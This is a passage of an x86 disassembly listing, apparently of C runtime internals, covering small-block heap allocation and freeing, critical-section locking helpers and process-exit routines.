loc_427BC9: ; CODE XREF: sub_427A4A+158�j
shr edx, cl
or [eax], edx
loc_427BCD: ; CODE XREF: sub_427A4A+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_427BE2
; ---------------------------------------------------------------------------
loc_427BDF: ; CODE XREF: sub_427A4A+E5�j
mov edx, [ebp+arg_4]
loc_427BE2: ; CODE XREF: sub_427A4A+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_427D38
; ---------------------------------------------------------------------------
loc_427BF1: ; CODE XREF: sub_427A4A+52�j
; sub_427A4A+5C�j
xor eax, eax
jmp loc_427D3B
; ---------------------------------------------------------------------------
loc_427BF8: ; CODE XREF: sub_427A4A+49�j
jge loc_427D38
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_427C23
push 3Fh
pop esi
loc_427C23: ; CODE XREF: sub_427A4A+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_427CB2
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_427C3C
push 3Fh
pop esi
loc_427C3C: ; CODE XREF: sub_427A4A+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_427C8B
cmp esi, 20h
jnb short loc_427C67
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_427C88
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_427C88
; ---------------------------------------------------------------------------
loc_427C67: ; CODE XREF: sub_427A4A+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_427C88
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_427C88: ; CODE XREF: sub_427A4A+214�j
; sub_427A4A+21B�j ...
mov ebx, [ebp+arg_4]
loc_427C8B: ; CODE XREF: sub_427A4A+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_427CB2
push 3Fh
pop esi
loc_427CB2: ; CODE XREF: sub_427A4A+1DD�j
; sub_427A4A+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_427D2F
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_427D06
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_427CF9
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_427CF9: ; CODE XREF: sub_427A4A+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_427D2B
; ---------------------------------------------------------------------------
loc_427D06: ; CODE XREF: sub_427A4A+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_427D1C
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_427D1C: ; CODE XREF: sub_427A4A+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_427D2B: ; CODE XREF: sub_427A4A+2BA�j
shr edx, cl
or [eax], edx
loc_427D2F: ; CODE XREF: sub_427A4A+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_427D38: ; CODE XREF: sub_427A4A+1A2�j
; sub_427A4A:loc_427BF8�j
push 1
pop eax
loc_427D3B: ; CODE XREF: sub_427A4A+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_427A4A endp
; =============== S U B R O U T I N E =======================================
sub_427D40 proc near ; CODE XREF: sub_42719C+41�p
; sub_428038:loc_428207�p
cmp dword_449A88, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_427D54
mov esi, offset off_449A78
jmp short loc_427D71
; ---------------------------------------------------------------------------
loc_427D54: ; CODE XREF: sub_427D40+B�j
push 2020h
push 0
push dword_6319BC
call dword_42F1EC ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_427E7D
loc_427D71: ; CODE XREF: sub_427D40+12�j
mov ebp, dword_42F1B8
push 4
push 2000h
push 400000h
push 0
call ebp ; dword_42F1B8
mov edi, eax
test edi, edi
jz loc_427E66
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; dword_42F1B8
test eax, eax
jz loc_427E58
mov eax, offset off_449A78
cmp esi, eax
jnz short loc_427DD0
cmp off_449A78, 0
jnz short loc_427DC0
mov off_449A78, eax
loc_427DC0: ; CODE XREF: sub_427D40+79�j
cmp off_449A7C, 0
jnz short loc_427DE5
mov off_449A7C, eax
jmp short loc_427DE5
; ---------------------------------------------------------------------------
loc_427DD0: ; CODE XREF: sub_427D40+70�j
mov [esi], eax
mov eax, off_449A7C
mov [esi+4], eax
mov off_449A7C, esi
mov eax, [esi+4]
mov [eax], esi
loc_427DE5: ; CODE XREF: sub_427D40+87�j
; sub_427D40+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_427E07: ; CODE XREF: sub_427D40+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_427E07
push ebx
push 0
push edi
call sub_4221F0
add esp, 0Ch
loc_427E30: ; CODE XREF: sub_427D40+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_427E54
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_427E30
; ---------------------------------------------------------------------------
loc_427E54: ; CODE XREF: sub_427D40+F7�j
mov eax, esi
jmp short loc_427E7F
; ---------------------------------------------------------------------------
loc_427E58: ; CODE XREF: sub_427D40+63�j
push 8000h
push 0
push edi
call dword_42F1BC ; VirtualFree
loc_427E66: ; CODE XREF: sub_427D40+4B�j
cmp esi, offset off_449A78
jz short loc_427E7D
push esi
push 0
push dword_6319BC
call dword_42F1F0 ; RtlFreeHeap
loc_427E7D: ; CODE XREF: sub_427D40+2B�j
; sub_427D40+12C�j
xor eax, eax
loc_427E7F: ; CODE XREF: sub_427D40+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_427D40 endp
; =============== S U B R O U T I N E =======================================
sub_427E84 proc near ; CODE XREF: sub_427EDA+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call dword_42F1BC ; VirtualFree
cmp off_44BA98, esi
jnz short loc_427EA9
mov eax, [esi+4]
mov off_44BA98, eax
loc_427EA9: ; CODE XREF: sub_427E84+1B�j
cmp esi, offset off_449A78
jz short loc_427ED1
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword_6319BC
call dword_42F1F0 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_427ED1: ; CODE XREF: sub_427E84+2B�j
or dword_449A88, 0FFFFFFFFh
pop esi
retn
sub_427E84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427EDA proc near ; CODE XREF: sub_427FF3+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_449A7C
push edi
loc_427EE7: ; CODE XREF: sub_427EDA+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_427F85
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_427F00: ; CODE XREF: sub_427EDA+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_427F41
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call dword_42F1BC ; VirtualFree
test eax, eax
jz short loc_427F41
or dword ptr [edi], 0FFFFFFFFh
dec dword_631400
mov eax, [esi+0Ch]
test eax, eax
jz short loc_427F36
cmp eax, edi
jbe short loc_427F39
loc_427F36: ; CODE XREF: sub_427EDA+56�j
mov [esi+0Ch], edi
loc_427F39: ; CODE XREF: sub_427EDA+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_427F4E
loc_427F41: ; CODE XREF: sub_427EDA+2C�j
; sub_427EDA+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_427F00
loc_427F4E: ; CODE XREF: sub_427EDA+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_427F85
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_427F85
push 1
lea eax, [ecx+20h]
pop edx
loc_427F65: ; CODE XREF: sub_427EDA+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_427F76
inc edx
add eax, 8
cmp edx, 400h
jl short loc_427F65
loc_427F76: ; CODE XREF: sub_427EDA+8E�j
cmp edx, 400h
jnz short loc_427F85
push ecx
call sub_427E84
pop ecx
loc_427F85: ; CODE XREF: sub_427EDA+11�j
; sub_427EDA+7D�j ...
cmp esi, off_449A7C
jz short loc_427F97
cmp [ebp+arg_0], 0
jg loc_427EE7
loc_427F97: ; CODE XREF: sub_427EDA+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_427EDA endp
; =============== S U B R O U T I N E =======================================
sub_427F9C proc near ; CODE XREF: sub_4230B3+90�p
; sub_4285CC+1D8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_449A78
push esi
mov ecx, edx
loc_427FA8: ; CODE XREF: sub_427F9C+1C�j
cmp eax, [ecx+10h]
jbe short loc_427FB2
cmp eax, [ecx+14h]
jb short loc_427FBA
loc_427FB2: ; CODE XREF: sub_427F9C+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_427FEF
jmp short loc_427FA8
; ---------------------------------------------------------------------------
loc_427FBA: ; CODE XREF: sub_427F9C+14�j
test al, 0Fh
jnz short loc_427FEF
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_427FEF
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_427FEF: ; CODE XREF: sub_427F9C+1A�j
; sub_427F9C+20�j ...
xor eax, eax
pop esi
retn
sub_427F9C endp
; =============== S U B R O U T I N E =======================================
sub_427FF3 proc near ; CODE XREF: sub_4230B3+A6�p
; sub_4285CC+246�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_428037
inc dword_631400
cmp dword_631400, 20h
jnz short locret_428037
push 10h
call sub_427EDA
pop ecx
locret_428037: ; CODE XREF: sub_427FF3+2B�j
; sub_427FF3+3A�j
retn
sub_427FF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428038 proc near ; CODE XREF: sub_422FB7+A7�p
; sub_423F63+C4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_44BA98
push edi
loc_428046: ; CODE XREF: sub_428038+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_4280F1
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_4280AB
loc_428071: ; CODE XREF: sub_428038+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_428094
cmp [edi+4], ebx
jbe short loc_428094
push ebx
push ecx
push eax
call sub_428240
add esp, 0Ch
test eax, eax
jnz short loc_428103
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_428094: ; CODE XREF: sub_428038+40�j
; sub_428038+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_428071
jmp short loc_4280AE
; ---------------------------------------------------------------------------
loc_4280AB: ; CODE XREF: sub_428038+37�j
mov ebx, [ebp+arg_0]
loc_4280AE: ; CODE XREF: sub_428038+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_4280F4
loc_4280C1: ; CODE XREF: sub_428038+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_4280E0
cmp [edi+4], ebx
jbe short loc_4280E0
push ebx
push eax
push [ebp+var_4]
call sub_428240
add esp, 0Ch
test eax, eax
jnz short loc_428103
mov [edi+4], ebx
loc_4280E0: ; CODE XREF: sub_428038+8D�j
; sub_428038+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_4280C1
jmp short loc_4280F4
; ---------------------------------------------------------------------------
loc_4280F1: ; CODE XREF: sub_428038+14�j
mov ebx, [ebp+arg_0]
loc_4280F4: ; CODE XREF: sub_428038+87�j
; sub_428038+B7�j
mov esi, [esi]
cmp esi, off_44BA98
jz short loc_428113
jmp loc_428046
; ---------------------------------------------------------------------------
loc_428103: ; CODE XREF: sub_428038+54�j
; sub_428038+A3�j
mov off_44BA98, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_42823B
; ---------------------------------------------------------------------------
loc_428113: ; CODE XREF: sub_428038+C4�j
mov eax, offset off_449A78
mov edi, eax
loc_42811A: ; CODE XREF: sub_428038+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_428126
cmp dword ptr [edi+0Ch], 0
jnz short loc_428132
loc_428126: ; CODE XREF: sub_428038+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_428207
jmp short loc_42811A
; ---------------------------------------------------------------------------
loc_428132: ; CODE XREF: sub_428038+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_428161
loc_428150: ; CODE XREF: sub_428038+127�j
cmp [ebp+var_4], 10h
jge short loc_428161
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_428150
loc_428161: ; CODE XREF: sub_428038+116�j
; sub_428038+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call dword_42F1B8 ; VirtualAlloc
cmp eax, esi
jnz loc_428239
push 0
push [ebp+var_8]
push esi
call sub_4221F0
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_4281C8
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_42819E: ; CODE XREF: sub_428038+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_42819E
loc_4281C8: ; CODE XREF: sub_428038+15E�j
mov off_44BA98, edi
lea eax, [edi+2018h]
loc_4281D4: ; CODE XREF: sub_428038+1A8�j
cmp ecx, eax
jnb short loc_4281E4
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_4281E2
add ecx, 8
jmp short loc_4281D4
; ---------------------------------------------------------------------------
loc_4281E2: ; CODE XREF: sub_428038+1A3�j
cmp ecx, eax
loc_4281E4: ; CODE XREF: sub_428038+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_42823B
; ---------------------------------------------------------------------------
loc_428207: ; CODE XREF: sub_428038+F2�j
call sub_427D40
test eax, eax
jz short loc_428239
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_44BA98, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_42823B
; ---------------------------------------------------------------------------
loc_428239: ; CODE XREF: sub_428038+143�j
; sub_428038+1D6�j
xor eax, eax
loc_42823B: ; CODE XREF: sub_428038+D6�j
; sub_428038+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_428038 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428240 proc near ; CODE XREF: sub_428038+4A�p
; sub_428038+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_428285
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_428274
add [ecx], edx
sub [ecx+4], edx
jmp short loc_42827D
; ---------------------------------------------------------------------------
loc_428274: ; CODE XREF: sub_428240+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_42827D: ; CODE XREF: sub_428240+32�j
lea eax, [edi+8]
jmp loc_428353
; ---------------------------------------------------------------------------
loc_428285: ; CODE XREF: sub_428240+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_42828E
mov eax, esi
loc_42828E: ; CODE XREF: sub_428240+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_4282D8
loc_428295: ; CODE XREF: sub_428240+96�j
mov bl, [eax]
test bl, bl
jnz short loc_4282CB
push 1
lea ebx, [eax+1]
pop esi
loc_4282A1: ; CODE XREF: sub_428240+68�j
cmp byte ptr [ebx], 0
jnz short loc_4282AA
inc ebx
inc esi
jmp short loc_4282A1
; ---------------------------------------------------------------------------
loc_4282AA: ; CODE XREF: sub_428240+64�j
cmp esi, edx
jnb short loc_4282FC
cmp eax, [ebp+var_4]
jnz short loc_4282B8
mov [ecx+4], esi
jmp short loc_4282C4
; ---------------------------------------------------------------------------
loc_4282B8: ; CODE XREF: sub_428240+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_42835D
loc_4282C4: ; CODE XREF: sub_428240+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_4282D0
; ---------------------------------------------------------------------------
loc_4282CB: ; CODE XREF: sub_428240+59�j
movzx esi, bl
add eax, esi
loc_4282D0: ; CODE XREF: sub_428240+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_428295
loc_4282D8: ; CODE XREF: sub_428240+53�j
lea esi, [ecx+8]
loc_4282DB: ; CODE XREF: sub_428240+EB�j
; sub_428240+F2�j
cmp esi, edi
jnb short loc_42835D
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_42835D
mov al, [esi]
test al, al
jnz short loc_42832D
push 1
lea ebx, [esi+1]
pop eax
loc_4282F3: ; CODE XREF: sub_428240+BA�j
cmp byte ptr [ebx], 0
jnz short loc_42831D
inc ebx
inc eax
jmp short loc_4282F3
; ---------------------------------------------------------------------------
loc_4282FC: ; CODE XREF: sub_428240+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_42830D
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_428316
; ---------------------------------------------------------------------------
loc_42830D: ; CODE XREF: sub_428240+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_428316: ; CODE XREF: sub_428240+CB�j
mov [eax], dl
add eax, 8
jmp short loc_428353
; ---------------------------------------------------------------------------
loc_42831D: ; CODE XREF: sub_428240+B6�j
cmp eax, edx
jnb short loc_428334
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_42835D
mov esi, ebx
jmp short loc_4282DB
; ---------------------------------------------------------------------------
loc_42832D: ; CODE XREF: sub_428240+AB�j
movzx eax, al
add esi, eax
jmp short loc_4282DB
; ---------------------------------------------------------------------------
loc_428334: ; CODE XREF: sub_428240+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_428345
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_42834E
; ---------------------------------------------------------------------------
loc_428345: ; CODE XREF: sub_428240+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_42834E: ; CODE XREF: sub_428240+103�j
mov [esi], dl
lea eax, [esi+8]
loc_428353: ; CODE XREF: sub_428240+40�j
; sub_428240+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_42835F
; ---------------------------------------------------------------------------
loc_42835D: ; CODE XREF: sub_428240+7E�j
; sub_428240+9D�j ...
xor eax, eax
loc_42835F: ; CODE XREF: sub_428240+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_428240 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428364 proc near ; CODE XREF: sub_4285CC+202�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_42839E
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_4283FE
; ---------------------------------------------------------------------------
loc_42839E: ; CODE XREF: sub_428364+26�j
jnb short loc_428405
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_428405
lea eax, [ecx+edx]
loc_4283B3: ; CODE XREF: sub_428364+59�j
cmp eax, esi
jnb short loc_4283C1
cmp byte ptr [eax], 0
jnz short loc_4283BF
inc eax
jmp short loc_4283B3
; ---------------------------------------------------------------------------
loc_4283BF: ; CODE XREF: sub_428364+56�j
cmp eax, esi
loc_4283C1: ; CODE XREF: sub_428364+51�j
jnz short loc_428405
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_4283F9
cmp esi, eax
jbe short loc_4283F9
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_4283F0
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_4283EB
loc_4283E4: ; CODE XREF: sub_428364+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_4283E4
loc_4283EB: ; CODE XREF: sub_428364+7E�j
mov [ebx+4], eax
jmp short loc_4283F9
; ---------------------------------------------------------------------------
loc_4283F0: ; CODE XREF: sub_428364+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_4283F9: ; CODE XREF: sub_428364+68�j
; sub_428364+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_4283FE: ; CODE XREF: sub_428364+38�j
mov [ebp+var_4], 1
loc_428405: ; CODE XREF: sub_428364:loc_42839E�j
; sub_428364+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_428364 endp
; =============== S U B R O U T I N E =======================================
sub_42840D proc near ; CODE XREF: sub_425936+1�p
push esi
mov esi, dword_42F1CC
push off_44BAE4
call esi ; dword_42F1CC
push off_44BAD4
call esi ; dword_42F1CC
push off_44BAC4
call esi ; dword_42F1CC
push off_44BAA4
call esi ; dword_42F1CC
pop esi
retn
sub_42840D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428436 proc near ; CODE XREF: sub_422FB7+3E�p
; sub_422FB7+94�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
cmp dword_44BAA0[eax*4], 0
lea esi, ds:44BAA0h[eax*4]
jnz short loc_42848C
push edi
push 18h
call sub_422F79
mov edi, eax
pop ecx
test edi, edi
jnz short loc_428465
push 11h
call sub_424FCB
pop ecx
loc_428465: ; CODE XREF: sub_428436+25�j
push 11h
call sub_428436
cmp dword ptr [esi], 0
pop ecx
push edi
jnz short loc_42847D
call dword_42F1CC ; InitializeCriticalSection
mov [esi], edi
jmp short loc_428483
; ---------------------------------------------------------------------------
loc_42847D: ; CODE XREF: sub_428436+3B�j
call sub_4230B3
pop ecx
loc_428483: ; CODE XREF: sub_428436+45�j
push 11h
call sub_428497
pop ecx
pop edi
loc_42848C: ; CODE XREF: sub_428436+16�j
push dword ptr [esi]
call dword_42F140 ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_428436 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_428497 proc near ; CODE XREF: sub_42301E+2�p
; sub_42307D+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push dword_44BAA0[eax*4]
call dword_42F144 ; RtlLeaveCriticalSection
pop ebp
retn
sub_428497 endp
; =============== S U B R O U T I N E =======================================
sub_4284AC proc near ; CODE XREF: .text:00424F68�p
mov eax, off_4493C8
test eax, eax
jz short loc_4284B7
call eax ; sub_42346C
loc_4284B7: ; CODE XREF: sub_4284AC+7�j
push offset dword_432030
push offset dword_43201C
call sub_4285B2
push offset dword_432018
push offset dword_432000
call sub_4285B2
add esp, 10h
retn
sub_4284AC endp
; =============== S U B R O U T I N E =======================================
sub_4284D9 proc near ; CODE XREF: .text:00424FA7�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_4284FB
add esp, 0Ch
retn
sub_4284D9 endp
; =============== S U B R O U T I N E =======================================
sub_4284EA proc near ; CODE XREF: .text:00424FC6�p
; sub_424FCB+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_4284FB
add esp, 0Ch
retn
sub_4284EA endp
; =============== S U B R O U T I N E =======================================
sub_4284FB proc near ; CODE XREF: sub_4284D9+8�p
; sub_4284EA+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
call sub_4285A0
push 1
pop edi
cmp dword_6314A8, edi
jnz short loc_42851D
push [esp+4+arg_0]
call dword_42F040 ; GetCurrentProcess
push eax
call dword_42F0EC ; TerminateProcess
loc_42851D: ; CODE XREF: sub_4284FB+F�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_6314A4, edi
mov byte_6314A0, bl
jnz short loc_428571
mov eax, dword_63199C
test eax, eax
jz short loc_428560
mov ecx, dword_631998
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_42855F
loc_42854C: ; CODE XREF: sub_4284FB+62�j
mov eax, [esi]
test eax, eax
jz short loc_428554
call eax
loc_428554: ; CODE XREF: sub_4284FB+55�j
sub esi, 4
cmp esi, dword_63199C
jnb short loc_42854C
loc_42855F: ; CODE XREF: sub_4284FB+4F�j
pop esi
loc_428560: ; CODE XREF: sub_4284FB+41�j
push offset dword_43203C
push offset dword_432034
call sub_4285B2
pop ecx
pop ecx
loc_428571: ; CODE XREF: sub_4284FB+38�j
push offset dword_432048
push offset dword_432040
call sub_4285B2
pop ecx
pop ecx
test ebx, ebx
pop ebx
jz short loc_42858E
call sub_4285A9
pop edi
retn
; ---------------------------------------------------------------------------
loc_42858E: ; CODE XREF: sub_4284FB+8A�j
push [esp+4+arg_0]
mov dword_6314A8, edi
call dword_42F06C ; ExitProcess
pop edi
retn
sub_4284FB endp
